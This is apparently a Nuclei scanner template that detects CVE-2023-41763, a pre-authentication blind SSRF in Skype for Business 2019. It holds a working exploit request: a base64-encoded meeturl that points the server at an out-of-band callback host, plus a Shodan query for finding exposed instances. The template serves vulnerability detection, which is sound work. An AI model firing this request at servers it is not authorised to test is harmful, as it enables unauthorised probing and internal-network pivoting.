38 lines
1.2 KiB
YAML
38 lines
1.2 KiB
YAML
id: CVE-2023-41763
|
|
|
|
info:
|
|
name: Skype for Business 2019 (SfB) - Blind Server-side Request Forgery
|
|
author: hateshape
|
|
severity: medium
|
|
description: |
|
|
Skype Pre-Auth Server-side Request Forgery (SSRF) vulnerability
|
|
reference:
|
|
- https://frycos.github.io/vulns4free/2022/09/26/skype-audit-part2.html
|
|
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-41763
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-41763
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: html:"Skype for Business"
|
|
tags: cve,cve2023,skype,blind-ssrf,oast,ssrf
|
|
variables:
|
|
ssrfpayload: "http://{{interactsh-url}}/?id={{rand_base(3)}}%25{1337*1337}#.xx//"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /lwa/Webpages/LwaClient.aspx?meeturl={{base64(ssrfpayload)}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the DNS Interaction
|
|
words:
|
|
- "dns"
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'Skype'
|
|
# digest: 490a00463044022052fae6df0e2b357b95c8bdca1a9d0a0099a80095ce32b6a4d362d6b816cb53790220470524a3fd320173bed915e6bc6438af6a3949ecb09986cd30283c5ccaf229ac:922c64590222798bb761d5b6d8e72950 |